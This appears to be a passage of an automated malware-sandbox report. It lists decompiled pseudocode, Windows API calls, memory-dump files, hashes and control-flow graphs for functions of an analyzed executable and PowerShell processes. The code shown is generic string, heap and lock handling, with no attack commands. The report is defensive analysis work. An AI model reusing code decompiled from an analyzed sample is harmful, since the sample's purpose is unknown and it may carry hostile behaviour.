                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prologLoadString
                              • String ID: KA
                              • API String ID: 385046869-4133974868
                              • Opcode ID: e6db0625694eca8672df4367e77b25990e3c0bbb9f4bdb8bdb41469bebcffd79
                              • Instruction ID: f8b33de4bb70f64bdff40eb498b0250b344fd9cf2a6d880d3b442eae3703c9f6
                              • Opcode Fuzzy Hash: e6db0625694eca8672df4367e77b25990e3c0bbb9f4bdb8bdb41469bebcffd79
                              • Instruction Fuzzy Hash: B8212771D0011A9BCB05EFA1C9919EEBBB5FF08308F10407AE106B6291DB794E40CB98
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00405EBC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E00405EBC(intOrPtr __ecx, struct HINSTANCE__* __edx) {
				intOrPtr _t29;
				CHAR* _t43;
				int _t49;
				void* _t51;

				E00413954(E00419748, _t51);
				 *((intOrPtr*)(_t51 - 0x10)) = __ecx;
				 *(_t51 - 0x14) = __edx;
				 *((intOrPtr*)(_t51 - 0x18)) = 0;
				 *(_t51 - 0x24) = 0;
				 *((intOrPtr*)(_t51 - 0x20)) = 0;
				 *((intOrPtr*)(_t51 - 0x1c)) = 0;
				E0040243E(_t51 - 0x24, 3);
				 *((intOrPtr*)(_t51 - 4)) = 0;
				_t49 = 0x100;
				do {
					_t49 = _t49 + 0x100;
					_t9 = _t49 - 1; // -1
					_t27 = _t9;
					if(_t9 >=  *((intOrPtr*)(_t51 - 0x1c))) {
						E0040243E(_t51 - 0x24, _t27);
					}
					_t14 = _t51 - 0x14; // 0x414be4
				} while (_t49 - LoadStringA( *_t14,  *(_t51 + 8),  *(_t51 - 0x24), _t49) <= 1);
				_t43 =  *(_t51 - 0x24);
				_t29 = 0;
				if( *_t43 != 0) {
					do {
						_t29 = _t29 + 1;
					} while ( *((intOrPtr*)(_t29 + _t43)) != 0);
				}
				 *((char*)(_t29 + _t43)) = 0;
				 *((intOrPtr*)(_t51 - 0x20)) = _t29;
				E00403D24( *((intOrPtr*)(_t51 - 0x10)), _t51 - 0x24);
				E00403A9C( *(_t51 - 0x24));
				 *[fs:0x0] =  *((intOrPtr*)(_t51 - 0xc));
				return  *((intOrPtr*)(_t51 - 0x10));
			}







                              0x00405ec1
                              0x00405eca
                              0x00405ed0
                              0x00405ed8
                              0x00405edb
                              0x00405ede
                              0x00405ee1
                              0x00405ee4
                              0x00405ee9
                              0x00405eec
                              0x00405ef1
                              0x00405ef1
                              0x00405ef7
                              0x00405ef7
                              0x00405efd
                              0x00405f03
                              0x00405f03
                              0x00405f0f
                              0x00405f1c
                              0x00405f21
                              0x00405f24
                              0x00405f28
                              0x00405f2a
                              0x00405f2a
                              0x00405f2b
                              0x00405f2a
                              0x00405f30
                              0x00405f36
                              0x00405f3d
                              0x00405f45
                              0x00405f53
                              0x00405f5b

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prologLoadString
                              • String ID: KA
                              • API String ID: 385046869-4133974868
                              • Opcode ID: 65d677eaf710bde40107d5e97ee8b2feebca7ae19d827cde6303db2279eeba92
                              • Instruction ID: 682fdee239e6c4724d42c8af7adc4720fc3e2d38c4520a7b7ac2604701000241
                              • Opcode Fuzzy Hash: 65d677eaf710bde40107d5e97ee8b2feebca7ae19d827cde6303db2279eeba92
                              • Instruction Fuzzy Hash: 6C1126B1D011199ACB06EFA5C9959EEBBB4FF18304F50447EE445B3291DB7A5E00CBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004160FA Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMONLIBRARYCODE
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E004160FA() {
				signed int _t15;
				void* _t17;
				void* _t19;
				void* _t25;
				signed int _t26;
				void* _t27;
				intOrPtr* _t29;

				_t15 =  *0x425a28; // 0x0
				_t26 =  *0x425a18; // 0x0
				if(_t15 != _t26) {
					L3:
					_t27 =  *0x425a2c; // 0x0
					_t29 = _t27 + (_t15 + _t15 * 4) * 4;
					_t17 = HeapAlloc( *0x425a34, 8, 0x41c4);
					 *(_t29 + 0x10) = _t17;
					if(_t17 == 0) {
						L6:
						return 0;
					}
					_t19 = VirtualAlloc(0, 0x100000, 0x2000, 4);
					 *(_t29 + 0xc) = _t19;
					if(_t19 != 0) {
						 *(_t29 + 8) =  *(_t29 + 8) | 0xffffffff;
						 *_t29 = 0;
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *0x425a28 =  *0x425a28 + 1;
						 *( *(_t29 + 0x10)) =  *( *(_t29 + 0x10)) | 0xffffffff;
						return _t29;
					}
					HeapFree( *0x425a34, 0,  *(_t29 + 0x10));
					goto L6;
				}
				_t2 = _t26 * 4; // 0x50
				_t25 = HeapReAlloc( *0x425a34, 0,  *0x425a2c, _t26 + _t2 + 0x50 << 2);
				if(_t25 == 0) {
					goto L6;
				}
				 *0x425a18 =  *0x425a18 + 0x10;
				 *0x425a2c = _t25;
				_t15 =  *0x425a28; // 0x0
				goto L3;
			}










                              0x004160fa
                              0x004160ff
                              0x0041610b
                              0x0041613d
                              0x0041613d
                              0x00416153
                              0x00416156
                              0x0041615e
                              0x00416161
                              0x0041618d
                              0x00000000
                              0x0041618d
                              0x00416170
                              0x00416178
                              0x0041617b
                              0x00416191
                              0x00416195
                              0x00416197
                              0x0041619a
                              0x004161a3
                              0x00000000
                              0x004161a6
                              0x00416187
                              0x00000000
                              0x00416187
                              0x0041610d
                              0x00416122
                              0x0041612a
                              0x00000000
                              0x00000000
                              0x0041612c
                              0x00416133
                              0x00416138
                              0x00000000

                              APIs
                              • HeapReAlloc.KERNEL32(00000000,00000050,00000000,00000000,00415EC2,00000000,00000000,00000000,00413EF1,00000000,00000000,?,00000000,00000000,00000000), ref: 00416122
                              • HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,00415EC2,00000000,00000000,00000000,00413EF1,00000000,00000000,?,00000000,00000000,00000000), ref: 00416156
                              • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 00416170
                              • HeapFree.KERNEL32(00000000,?), ref: 00416187
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: AllocHeap$FreeVirtual
                              • String ID:
                              • API String ID: 3499195154-0
                              • Opcode ID: b9288557613d4b1507cb107ac5399481b8ee784b68c3247b56fc213fdecf1f33
                              • Instruction ID: c92a38fae87bb937ac208a7a453d8678043178d73965b4d0b203d58dccefea2c
                              • Opcode Fuzzy Hash: b9288557613d4b1507cb107ac5399481b8ee784b68c3247b56fc213fdecf1f33
                              • Instruction Fuzzy Hash: 98112B31300B01BFC7318F29EC869567BB5FB49764791862AF151C65B0C7709842CF48
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004156E1 Relevance: 5.0, APIs: 4, Instructions: 12COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E004156E1(void* __eax) {
				void* _t1;

				_t1 = __eax;
				InitializeCriticalSection( *0x42078c);
				InitializeCriticalSection( *0x42077c);
				InitializeCriticalSection( *0x42076c);
				InitializeCriticalSection( *0x42074c);
				return _t1;
			}




                              0x004156e1
                              0x004156ee
                              0x004156f6
                              0x004156fe
                              0x00415706
                              0x00415709

                              APIs
                              • InitializeCriticalSection.KERNEL32(?,004154C2,?,00414B74), ref: 004156EE
                              • InitializeCriticalSection.KERNEL32(?,004154C2,?,00414B74), ref: 004156F6
                              • InitializeCriticalSection.KERNEL32(?,004154C2,?,00414B74), ref: 004156FE
                              • InitializeCriticalSection.KERNEL32(?,004154C2,?,00414B74), ref: 00415706
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: CriticalInitializeSection
                              • String ID:
                              • API String ID: 32694325-0
                              • Opcode ID: 9da826fcb73db9b2f0886f92194b085cad0f2cdeae026ac3c84f39be76329a94
                              • Instruction ID: 9a5a21d657ffcc76f5c3c67f011d6e28d8344b300781f1748fbef07cd2b7b2eb
                              • Opcode Fuzzy Hash: 9da826fcb73db9b2f0886f92194b085cad0f2cdeae026ac3c84f39be76329a94
                              • Instruction Fuzzy Hash: CCC00231A05138ABCB712B65FC048563FB5EB882A03558077A1045203186612C12EFD8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Executed Functions

                              Function 00007FF8163B1C59 Relevance: .2, Instructions: 173COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.424469620.00007FF8163B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7ff8163b0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bcbd1499737b02a10790536d659e8440da92eb0421aa6ceb59252d710f3e0ca3
                              • Instruction ID: 9541ed6a97d5b03d13cf7dcc3ddfbe9e6c507bb32b4893cf002164c7c607d78f
                              • Opcode Fuzzy Hash: bcbd1499737b02a10790536d659e8440da92eb0421aa6ceb59252d710f3e0ca3
                              • Instruction Fuzzy Hash: 7751063191CE494FD345DB18E854BA6BBE1FFC5361F1847BAE08DC72A2CE28A945C781
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF8163B1775 Relevance: .0, Instructions: 49COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.424469620.00007FF8163B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7ff8163b0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: abfb08509ba2ad3dcb560ce6df667010d1f52f3db04242593f4bff19157a36dc
                              • Instruction ID: 116f08d056536bd5b228816cd2fd0e0eea4df47e38520604a18b199e38f694b9
                              • Opcode Fuzzy Hash: abfb08509ba2ad3dcb560ce6df667010d1f52f3db04242593f4bff19157a36dc
                              • Instruction Fuzzy Hash: 5601677111CB0C4FD744EF0CE451AA6B7E0FB95364F10056EE58AC7691DA36E881CB45
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Execution Graph

                              Execution Coverage:4.1%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:0%
                              Total number of Nodes:4
                              Total number of Limit Nodes:1
                              execution_graph 40233 3c1c3b8 40235 3c1c33f CreateFileW 40233->40235 40236 3c1c3c6 40233->40236 40237 3c1c391 40235->40237

                              Executed Functions

                              Function 06F18760 Relevance: .7, Instructions: 693COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 351 6f18760-6f1879f 353 6f187a5-6f187e7 351->353 354 6f1911d-6f19180 351->354 361 6f18a20-6f18a53 353->361 362 6f187ed-6f18880 353->362 371 6f18a59-6f18abc 361->371 372 6f18b5a-6f18b70 361->372 426 6f18886-6f188a1 362->426 427 6f189ff-6f18a1d 362->427 419 6f18b42-6f18b57 371->419 420 6f18ac2-6f18ada 371->420 377 6f18b72-6f18b78 372->377 378 6f18b7e-6f18bad 372->378 377->378 380 6f18c2c-6f18c6d call 6f18130 377->380 393 6f18be5-6f18c29 call 6f18130 378->393 394 6f18baf-6f18bca call 6f18130 378->394 403 6f18caf-6f18cd6 380->403 404 6f18c6f-6f18c97 380->404 410 6f18ce2-6f18ce8 403->410 404->403 425 6f18c99-6f18ca4 404->425 412 6f18cea-6f18cf8 410->412 413 6f18cfe-6f18d04 410->413 412->413 430 6f18dda-6f18de0 412->430 415 6f18d06-6f18d14 413->415 416 6f18d1a-6f18d26 413->416 415->416 415->430 437 6f18d72-6f18d7e 416->437 438 6f18d28-6f18d5a 416->438 419->372 422 6f18aed-6f18af7 420->422 423 6f18adc-6f18ae0 420->423 443 6f18af9-6f18aff 422->443 444 6f18b0f-6f18b15 422->444 423->422 431 6f18ae2-6f18ae5 423->431 439 6f18cad 425->439 428 6f188a3-6f188a7 426->428 429 6f188b7-6f188c4 426->429 427->361 428->429 435 6f188a9-6f188af 428->435 449 6f188c6-6f188cc 429->449 450 6f188dc-6f188e2 429->450 440 6f18de6-6f18e4b 430->440 441 6f18ffb-6f19001 430->441 431->422 435->429 437->430 457 6f18d80-6f18db2 437->457 438->437 477 6f18d5c-6f18d6c 438->477 439->410 491 6f18e51-6f18e65 440->491 492 6f18fa4-6f18fc5 440->492 445 6f19007-6f1905e 441->445 446 6f190fe-6f19105 441->446 451 6f18b01 443->451 452 6f18b03-6f18b05 443->452 454 6f18b22-6f18b40 444->454 455 6f18b17-6f18b1b 444->455 494 6f19060-6f19081 445->494 495 6f190b4-6f190c9 445->495 458 6f188d0-6f188d2 449->458 459 6f188ce 449->459 460 6f188e4-6f188e8 450->460 461 6f188ef-6f18906 450->461 451->444 452->444 454->419 454->420 455->454 462 6f18b1d-6f18b1f 455->462 457->430 485 6f18db4-6f18dca 457->485 458->450 459->450 460->461 464 6f188ea-6f188ec 460->464 470 6f189ea-6f189f9 461->470 471 6f1890c-6f18951 461->471 462->454 464->461 470->426 470->427 505 6f18953-6f1895a 471->505 506 6f189ba-6f189cf 471->506 477->437 485->430 497 6f18f2b-6f18f4f 491->497 498 6f18e6b-6f18e86 491->498 492->441 507 6f19083-6f19089 494->507 508 6f19099-6f190b2 494->508 495->446 518 6f18f51-6f18f57 497->518 519 6f18f69-6f18f9e 497->519 498->497 504 6f18e8c-6f18ed2 498->504 541 6f18f13-6f18f28 504->541 542 6f18ed4-6f18ee1 504->542 511 6f1896d-6f18977 505->511 512 6f1895c-6f18960 505->512 506->470 509 6f1908b 507->509 510 6f1908d-6f1908f 507->510 508->494 508->495 509->508 510->508 523 6f18979-6f1897f 511->523 524 6f1898f-6f18995 511->524 512->511 517 6f18962-6f18965 512->517 517->511 520 6f18f59 518->520 521 6f18f5b-6f18f67 518->521 519->491 519->492 520->519 521->519 529 6f18981 523->529 530 6f18983-6f18985 523->530 531 6f189a2-6f189b8 524->531 532 6f18997-6f1899b 524->532 529->524 530->524 531->505 531->506 532->531 534 6f1899d-6f1899f 532->534 534->531 541->497 545 6f18ee3-6f18ee9 542->545 546 6f18ef9-6f18f11 542->546 547 6f18eeb 545->547 548 6f18eed-6f18eef 545->548 546->541 546->542 547->546 548->546
                              Memory Dump Source
                              • Source File: 00000018.00000002.439335533.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6f10000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1ebf16b34079cb44d62b2c9a8e72141265e065cc82d6d7994492eb161fc5622a
                              • Instruction ID: 27749964efb38fa7094813b1c28a553498df1ac5af336036751571dd9e6be900
                              • Opcode Fuzzy Hash: 1ebf16b34079cb44d62b2c9a8e72141265e065cc82d6d7994492eb161fc5622a
                              • Instruction Fuzzy Hash: EE524A34A00209CFDB64DF24C950BAE73B2EF89384F1185A9D91AAF294DB35DD45CFA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 03C1C238 Relevance: 1.6, APIs: 1, Instructions: 123fileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 3c1c238-3c1c257 1 3c1c2c4-3c1c34c 0->1 2 3c1c259-3c1c26b 0->2 16 3c1c354-3c1c376 1->16 17 3c1c34e-3c1c351 1->17 3 3c1c272-3c1c2a7 2->3 4 3c1c26d 2->4 11 3c1c2b1-3c1c2b2 3->11 12 3c1c2a9 3->12 4->3 11->1 12->11 19 3c1c377-3c1c38f CreateFileW 16->19 20 3c1c33f-3c1c34c 16->20 17->16 21 3c1c391-3c1c397 19->21 22 3c1c398-3c1c3b5 19->22 20->16 20->17 21->22
                              APIs
                              • CreateFileW.KERNELBASE(00000000,?,?,?,?,?,?), ref: 03C1C382
                              Memory Dump Source
                              • Source File: 00000018.00000002.431031970.0000000003C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 03C10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_3c10000_powershell.jbxd
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: 531d045e3a2906ca296c9188816a3b3ca07b9f08b6d0580e93bc941d654f32e0
                              • Instruction ID: aa21ebcaba2030fb0af368dad3a0e3e1af155af2c67ded5e452544b6f329c89e
                              • Opcode Fuzzy Hash: 531d045e3a2906ca296c9188816a3b3ca07b9f08b6d0580e93bc941d654f32e0
                              • Instruction Fuzzy Hash: 2D419B71A002599FCB15CFA9C854AEEFBB5AF49314F188169E804FB750CB349A14DBE1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 03C1C2C3 Relevance: 1.6, APIs: 1, Instructions: 81fileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 25 3c1c2c3-3c1c34c 31 3c1c354-3c1c376 25->31 32 3c1c34e-3c1c351 25->32 34 3c1c377-3c1c38f CreateFileW 31->34 35 3c1c33f-3c1c34c 31->35 32->31 36 3c1c391-3c1c397 34->36 37 3c1c398-3c1c3b5 34->37 35->31 35->32 36->37
                              APIs
                              • CreateFileW.KERNELBASE(00000000,?,?,?,?,?,?), ref: 03C1C382
                              Memory Dump Source
                              • Source File: 00000018.00000002.431031970.0000000003C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 03C10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_3c10000_powershell.jbxd
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: 2b526d051a923ae6d9ebc33dfe12b2d2c1dd5293f74b328a3d0c1ab91d61c8ec
                              • Instruction ID: df39e608cf091e7ad87a21b8db65eaaf26dae5335157712ebe080b58935ce24f
                              • Opcode Fuzzy Hash: 2b526d051a923ae6d9ebc33dfe12b2d2c1dd5293f74b328a3d0c1ab91d61c8ec
                              • Instruction Fuzzy Hash: 6B31AB71A002999FCB01CFA9D890ADEBFB5FF49314F04815AE815EB751C7349A18CBE2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 03C1C3B8 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 40 3c1c3b8-3c1c3c4 41 3c1c376 40->41 42 3c1c3c6-3c1c448 40->42 43 3c1c377-3c1c38f CreateFileW 41->43 44 3c1c33f-3c1c34c 41->44 48 3c1c391-3c1c397 43->48 49 3c1c398-3c1c3b5 43->49 46 3c1c354-3c1c374 44->46 47 3c1c34e-3c1c351 44->47 46->41 47->46 48->49
                              Memory Dump Source
                              • Source File: 00000018.00000002.431031970.0000000003C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 03C10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_3c10000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8f29276a25f3da4eb3d6f771a559323b6e8f5be360d2e7e28991170ce9778c8b
                              • Instruction ID: 9ca186cf5420741aca3ee84ca62e4b1d718b485ff7323bdd374a0cc7803e338a
                              • Opcode Fuzzy Hash: 8f29276a25f3da4eb3d6f771a559323b6e8f5be360d2e7e28991170ce9778c8b
                              • Instruction Fuzzy Hash: DE11D0B2840255EFDF01CF94C8846DEBBB0FB5A314F488189E819DB610C335D665EBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 06F1FAC7 Relevance: 1.4, Strings: 1, Instructions: 141COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 52 6f1fac7-6f1faec 54 6f1fb4d-6f1fb5f 52->54 55 6f1faee-6f1fb1e call 6f1f7ec 52->55 59 6f1fb61-6f1fb9b call 6f1f7f8 54->59 60 6f1fb9d-6f1fba4 54->60 65 6f1fb25-6f1fb49 55->65 59->60 64 6f1fba5-6f1fc51 59->64 77 6f1fc53-6f1fc59 64->77 78 6f1fc5a-6f1fc6e 64->78 65->60 71 6f1fb4b 65->71 71->54 77->78
                              Strings
                              Memory Dump Source
                              • Source File: 00000018.00000002.439335533.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6f10000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID: 0
                              • API String ID: 0-4108050209
                              • Opcode ID: 5ddd4730ac39b0cea2abe7dd1562f8fd74d2775777f675b56d325b67ed599821
                              • Instruction ID: 564b39f26babee19485f94be5635ec03cd14f0703b7cb60c3ae879e276bc352f
                              • Opcode Fuzzy Hash: 5ddd4730ac39b0cea2abe7dd1562f8fd74d2775777f675b56d325b67ed599821
                              • Instruction Fuzzy Hash: 2151F170A053489FDB10DBA5D854BEFBBF9EF49354F104469D406AB340DB39980ACBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0676E6E0 Relevance: .9, Instructions: 945COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 80 676e6e0-676e701 81 676e766-676e7a3 80->81 82 676e703-676e70f 80->82 92 676e7e4-676e816 81->92 93 676e7a5-676e7b1 81->93 85 676e711-676e718 82->85 86 676e71a-676e71e 82->86 88 676e75c-676e765 85->88 89 676e726-676e728 86->89 89->88 90 676e72a-676e739 89->90 90->88 104 676e81e-676e839 92->104 105 676e818-676e81d 92->105 95 676e7b3-676e7c4 93->95 96 676e7d9 93->96 95->96 100 676e7c6-676e7d7 95->100 97 676e7de-676e7e3 96->97 100->96 100->97 106 676e84a 104->106 107 676e83b-676e848 104->107 105->104 108 676e84f-676e851 106->108 107->108 109 676e857-676e862 108->109 110 676eb1e-676eb94 108->110 113 676e864-676e86d 109->113 114 676e870-676e8c6 109->114 130 676eb96-676ebab 110->130 131 676ebed-676ebf9 110->131 123 676e8f7-676e8fa 114->123 124 676e8c8-676e8f5 114->124 126 676e910-676e949 123->126 127 676e8fc-676e90b 123->127 124->123 146 676e951-676e957 126->146 147 676e94b-676e94f 126->147 135 676eb11-676eb1b 127->135 130->131 144 676ebad-676ebe8 130->144 139 676ec37-676ec43 131->139 140 676ebfb-676ec32 131->140 149 676ed20-676ed2c 139->149 150 676ec49-676ec60 139->150 163 676f326-676f32d 140->163 144->163 146->135 147->146 148 676e95c-676e9b7 147->148 148->135 162 676e9bd-676e9c9 148->162 157 676ed67-676ed73 149->157 158 676ed2e-676ed62 149->158 164 676ec62-676ec87 150->164 165 676ec8c-676ec9f 150->165 172 676eec8-676eed4 157->172 173 676ed79-676ed90 157->173 158->163 166 676eae2-676eae6 162->166 189 676ed0c-676ed1b 164->189 191 676eca1-676eca9 165->191 192 676ecab-676ecbe 165->192 170 676eaf7 166->170 171 676eae8-676eaf5 166->171 174 676eafc-676eafe 170->174 171->174 183 676efb7-676efc3 172->183 184 676eeda-676eee6 172->184 195 676ed96-676edac 173->195 196 676ee23-676ee2d 173->196 181 676eb04-676eb0e 174->181 182 676e9ce-676e9e5 174->182 197 676ead0-676ead4 182->197 198 676e9eb 182->198 201 676efc5-676efdc 183->201 202 676f021-676f02d 183->202 203 676eef6-676ef2d 184->203 204 676eee8-676eef4 184->204 189->163 191->189 220 676ece7-676ed0a 192->220 221 676ecc0-676ece5 192->221 228 676edae-676ede5 195->228 229 676edea-676ee1e 195->229 215 676ee2f-676ee66 196->215 216 676ee6b-676ee80 196->216 197->166 206 676ead6-676eadf 197->206 205 676e9ee-676ea07 198->205 238 676efde-676f015 201->238 239 676f01a-676f01c 201->239 218 676f02f-676f066 202->218 219 676f06b-676f077 202->219 203->163 204->203 222 676ef32-676ef3c 204->222 224 676ea60-676ea93 205->224 225 676ea09-676ea24 205->225 215->163 216->172 251 676ee82-676eec3 216->251 218->163 245 676f0b5-676f0c1 219->245 246 676f079-676f0b0 219->246 220->189 221->189 241 676ef3e-676ef75 222->241 242 676ef7a-676efb2 222->242 276 676ea95-676eab6 224->276 277 676eab8 224->277 225->224 257 676ea26-676ea41 225->257 228->163 229->163 238->163 239->163 241->163 242->163 268 676f0c3-676f0cf 245->268 269 676f121-676f12d 245->269 246->163 251->163 257->224 293 676ea43-676ea5e 257->293 291 676f0e4 268->291 292 676f0d1-676f0db 268->292 286 676f12f-676f13b 269->286 287 676f18d-676f1a5 269->287 282 676eabe-676eac1 276->282 277->282 282->197 302 676f150 286->302 303 676f13d-676f147 286->303 311 676f1a7-676f1b3 287->311 312 676f20b-676f217 287->312 295 676f0e9-676f11c 291->295 292->291 305 676f0dd-676f0e2 292->305 293->224 313 676eac3-676eaca 293->313 295->163 306 676f155-676f188 302->306 303->302 314 676f149-676f14e 303->314 305->295 306->163 322 676f1b5-676f1cd 311->322 323 676f1cf-676f206 311->323 319 676f21d-676f2a4 312->319 320 676f2a9-676f2ca 312->320 313->197 313->205 314->306 319->163 333 676f330-676f353 320->333 334 676f2cc-676f2d4 320->334 322->312 322->323 323->163 335 676f2d6-676f2e9 334->335 336 676f324 334->336 335->336 344 676f2eb-676f322 335->344 336->163 344->163
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3c490990a92974b4da12a4b50f5184eac804dacee9db31946312d1e9e805ebe7
                              • Instruction ID: 7afc641691b395a0aa753f91fc227c75bf74ec15725d9b825a880c35e17add7e
                              • Opcode Fuzzy Hash: 3c490990a92974b4da12a4b50f5184eac804dacee9db31946312d1e9e805ebe7
                              • Instruction Fuzzy Hash: E472C4747002049FDB94EF76D8506BE7BA6EF85208B14846DE806DF391EF75DC068BA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0676AB60 Relevance: .4, Instructions: 358COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
